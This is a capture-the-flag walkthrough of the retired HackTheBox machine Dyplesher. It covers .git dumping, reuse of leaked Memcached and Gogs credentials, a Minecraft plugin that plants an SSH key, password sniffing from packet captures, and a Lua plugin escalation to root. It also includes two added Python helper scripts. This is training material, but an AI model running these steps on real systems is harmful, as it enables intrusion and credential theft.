Hackthebox — Dyplesher

Summary

Today we have another Linux machine that has been retired, with IP 10.10.10.190.

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.190
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-15 14:48 EET
Nmap scan report for 10.10.10.190
Host is up (0.079s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:ca:81:78:ec:27:8f:50:60:db:79:cf:97:f7:05:c0 (RSA)
| 256 e0:d7:c7:9f:f2:7f:64:0d:40:29:18:e1:a1:a0:37:5e (ECDSA)
|_ 256 9f:b2:4c:5c:de:44:09:14:ce:4f:57:62:0b:f9:71:81 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyplesher
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=968c960820a086d9; Path=/; HttpOnly
| Set-Cookie: _csrf=zfXkCZCCL03J-dCZ6lH25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng%3D%3D; Path=/; Expires=Tue, 16 Jun 2020 12:54:44 GMT; HttpOnly
| Date: Mon, 15 Jun 2020 12:54:44 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
| <meta name="author" content="Gogs" />
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
| <meta name="keywords" content="go, git, self-hosted, gogs">
| <meta name="referrer" content="no-referrer" />
| <meta name="_csrf" content="zfXkCZCCL03J-dCZ6lH25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng==" />
| <meta name="_suburl" content="" />
| <meta proper
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=4228884f43ce6ee5; Path=/; HttpOnly
| Set-Cookie: _csrf=8sEcAMp478CzoxzyIS5f8nL8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA%3D%3D; Path=/; Expires=Tue, 16 Jun 2020 12:54:50 GMT; HttpOnly
| Date: Mon, 15 Jun 2020 12:54:50 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
| <meta name="author" content="Gogs" />
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
| <meta name="keywords" content="go, git, self-hosted, gogs">
| <meta name="referrer" content="no-referrer" />
| <meta name="_csrf" content="8sEcAMp478CzoxzyIS5f8nL8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA==" />
| <meta name="_suburl" content="" />
|_ <meta
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.99 seconds
root@strike:~#

We have 3 open ports: 22(ssh), 80(http), 3000(…)

Web Enumerate

I found another hostname (test.dyplesher.htb), so I added it to /etc/hosts.

Let's fuzz it for directories and files

root@strike:~# wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt --hc 404,403 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://test.dyplesher.htb/FUZZ
Total requests: 4614

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 14 L 27 W 239 Ch ""
000009: C=200 1 L 2 W 23 Ch ".git/HEAD"
002021: C=200 14 L 27 W 239 Ch "index.php"
Total time: 38.83439
Processed Requests: 4614
Filtered Requests: 4611
Requests/sec.: 118.8122

root@strike:~#

I found .git, but I can't browse it from the browser (the directory itself returns 403), so I dumped its contents using the git-dumper tool

root@strike:~/git-dumper# ./git-dumper.py http://test.dyplesher.htb/.git /root/Dsktop/dump
[-] Testing http://test.dyplesher.htb/.git/HEAD [200]
[-] Testing http://test.dyplesher.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://test.dyplesher.htb/.gitignore [404]
[-] Fetching http://test.dyplesher.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://test.dyplesher.htb/.git/description [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-commit.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-receive.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/index [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/info/packs [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/info/exclude [200]
[-] Finding refs/
[-] Fetching http://test.dyplesher.htb/.git/FETCH_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/ORIG_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/config [200]
[-] Fetching http://test.dyplesher.htb/.git/info/refs [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/packed-refs [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/index/refs/heads/master [404]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://test.dyplesher.htb/.git/objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://test.dyplesher.htb/.git/objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433 [200]
[-] Running git checkout .
root@strike:~/git-dumper#
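The point this dump illustrates is that a 403 on /.git/ does not protect the repository: as long as /.git/HEAD (and the object files under it) answer 200, the whole history can be reconstructed. The following is an added example, not part of the write-up or of git-dumper, that a site owner can run against their own host to confirm whether the directory is exposed; the only target it assumes is the page's test.dyplesher.htb, passed on the command line.

```python
import re
import urllib.error
import urllib.request

# A valid .git/HEAD is either a symbolic ref or a bare 40-hex commit id.
HEAD_RE = re.compile(r"^(ref: refs/heads/\S+|[0-9a-f]{40})\n?$")

def looks_like_git_head(body: bytes) -> bool:
    """True when a response body is a plausible .git/HEAD file rather than an HTML error page."""
    if len(body) > 256:
        return False
    try:
        text = body.decode("ascii")
    except UnicodeDecodeError:
        return False
    return HEAD_RE.match(text) is not None

def fetch(url: str, timeout: float = 5.0):
    """Return (status, body); HTTP errors yield their status code, network errors yield (None, b'')."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, b""
    except urllib.error.URLError:
        return None, b""

def git_dir_exposed(base_url: str) -> bool:
    """Check a web root the way git-dumper starts: /.git/HEAD answering 200 with real ref
    content means the objects under /.git/objects/ are fetchable, whatever /.git/ itself returns."""
    status, body = fetch(base_url.rstrip("/") + "/.git/HEAD")
    return status == 200 and looks_like_git_head(body)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://test.dyplesher.htb"
    print("exposed" if git_dir_exposed(target) else "not exposed", target)
```

The fix on the Apache side is to deny access to the .git directory entirely (or not deploy it); the check above then reports "not exposed".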

After dumping, I found credentials for Memcached in index.php: username felamos, password zxcvbnm, on service port 11211.
Let's take a look using memcached-cli

root@strike:~# memcached-cli felamos:zxcvbnm@dyplesher.htb
dyplesher.htb> get username
MinatoTWfelamosyuntao
dyplesher.htb> get password
$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS

I tried to crack them with john

After that I decided to take a look at http://dyplesher.htb:3000, where I registered and logged in

Under felamos we can find gitlab.git and memcached.git
I tried to log in with felamos' credentials

Let's download repo.zip and unzip it

root@strike:~# cd Downloads/
root@strike:~/Downloads# unzip repo.zip
Archive: repo.zip
creating: repositories/
creating: repositories/@hashed/
creating: repositories/@hashed/4b/
creating: repositories/@hashed/4b/22/
inflating: repositories/@hashed/4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
creating: repositories/@hashed/4e/
creating: repositories/@hashed/4e/07/
creating: repositories/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/
inflating: repositories/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
creating: repositories/@hashed/6b/
creating: repositories/@hashed/6b/86/
inflating: repositories/@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
creating: repositories/@hashed/d4/
creating: repositories/@hashed/d4/73/
inflating: repositories/@hashed/d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
root@strike:~/Downloads#

I put a git clone command for each of the four .bundle files into a hash.sh file

root@strike:~/Downloads# cat hash.sh 
git clone 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
git clone 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
git clone 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
git clone d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
root@strike:~/Downloads# chmod +x hash.sh
root@strike:~/Downloads# ./hash.sh
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...
Receiving objects: 100% (39/39), 10.46 KiB | 10.46 MiB/s, done.
Resolving deltas: 100% (12/12), done.
Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...
Receiving objects: 100% (51/51), 20.94 MiB | 59.55 MiB/s, done.
Resolving deltas: 100% (5/5), done.
Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...
Receiving objects: 100% (85/85), 30.69 KiB | 10.23 MiB/s, done.
Resolving deltas: 100% (40/40), done.
Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...
Receiving objects: 100% (21/21), 16.98 KiB | 16.98 MiB/s, done.
Resolving deltas: 100% (9/9), done.
root@strike:~/Downloads#
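The bundle names are not random: GitLab's hashed storage names each repository directory after the SHA-256 of its decimal project ID, so the four bundles above are simply projects 1 through 4. The script below is an added example (not the write-up's hash.sh and not GitLab code) that resolves each bundle back to its project ID and clones it into a directory named after that ID; the bundle paths are taken from the unzip listing above.

```python
import hashlib
import os
import re
import subprocess

# Constructed input: the four bundle paths from the repo.zip listing above.
BUNDLES = [
    "repositories/@hashed/4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle",
    "repositories/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle",
    "repositories/@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle",
    "repositories/@hashed/d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle",
]

def hashed_storage_path(project_id: int) -> str:
    """GitLab hashed storage: sha256 of the decimal project ID, sharded by its first two byte pairs."""
    digest = hashlib.sha256(str(project_id).encode()).hexdigest()
    return f"@hashed/{digest[:2]}/{digest[2:4]}/{digest}"

def resolve_project_ids(bundle_paths, max_id: int = 10000) -> dict:
    """Map each bundle back to its numeric project ID by enumerating the small ID space.
    Names that are not a 64-hex bundle, or whose hash is outside the range, map to None."""
    table = {hashlib.sha256(str(i).encode()).hexdigest(): i for i in range(1, max_id + 1)}
    ids = {}
    for path in bundle_paths:
        m = re.fullmatch(r"([0-9a-f]{64})\.bundle", os.path.basename(path))
        ids[path] = table.get(m.group(1)) if m else None
    return ids

def clone_commands(bundle_paths):
    """Same job as the page's hash.sh, but each clone lands in a directory named after its project ID."""
    ids = resolve_project_ids(bundle_paths)
    cmds = []
    for path in bundle_paths:
        dest = f"project-{ids[path]}" if ids[path] is not None else os.path.basename(path)[:-len(".bundle")]
        cmds.append(["git", "clone", path, dest])
    return cmds

if __name__ == "__main__":
    for cmd in clone_commands(BUNDLES):
        subprocess.run(cmd, check=True)
```

Knowing the ID order also tells you which bundle is the oldest project, which is useful when deciding where to look for configuration or credential files first.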

After searching I found the user.db file, and it contains a hash

$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6

So let's crack it

Log in again with the new credentials, user felamos@dyplesher.htb and password alexis1

Then I found the "AddPlugin" page and tried to add some files to see how it responds

We can also see that http://test.dyplesher.htb is deployed under /var/www/test/ and is owned by MinatoTW

For the IDE where we'll write the Minecraft plugin we can either use Eclipse

Use this method to create a blank Spigot plugin

After making the plugin write your public key into authorized_keys, upload it on http://dyplesher.htb/home/add and load it on http://dyplesher.htb/home/reload

Now connect via SSH to the MinatoTW account with your key

root@strike:~/Desktop# ssh -i id_rsa MinatoTW@dyplesher.htb
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 15 Jun 2020 03:05:00 PM UTC

System load: 0.37 Processes: 238
Usage of /: 6.7% of 97.93GB Users logged in: 0
Memory usage: 39% IP address for ens33: 10.10.10.190
Swap usage: 0% IP address for docker0: 172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
MinatoTW@dyplesher:~$

But I didn't find the user flag. After searching I found that MinatoTW belongs to the wireshark group, so we can capture traffic, download the capture and analyze it
Try to download capture.pcap

I found credentials for some users:
* MinatoTW : bihys1amFov
* yuntao : wagthAw4ob / EashAnicOc3Op
* felamos : tieb0graQueg

Try to log in as felamos with this password

Gain user flag!

Privilege Escalation

I found lua is running, so we can use a malicious plugin to get root

Plugin for lua and python script:
https://github.com/khanmoin/htb_scripts/tree/master/rabbitmq_dyp

  • Write the lua script on the dyplesher machine with your own id_rsa.pub
  • Write the python script on our device
  • Launch a python server on the dyplesher machine
  • Run the python script

Response

Let's try to connect

It works!
Gain root flag!

If you learned anything useful from this write-up, respect me on HackTheBox.

Thanks for your time!

Ahmed Samir
CTFer | Computer Science Student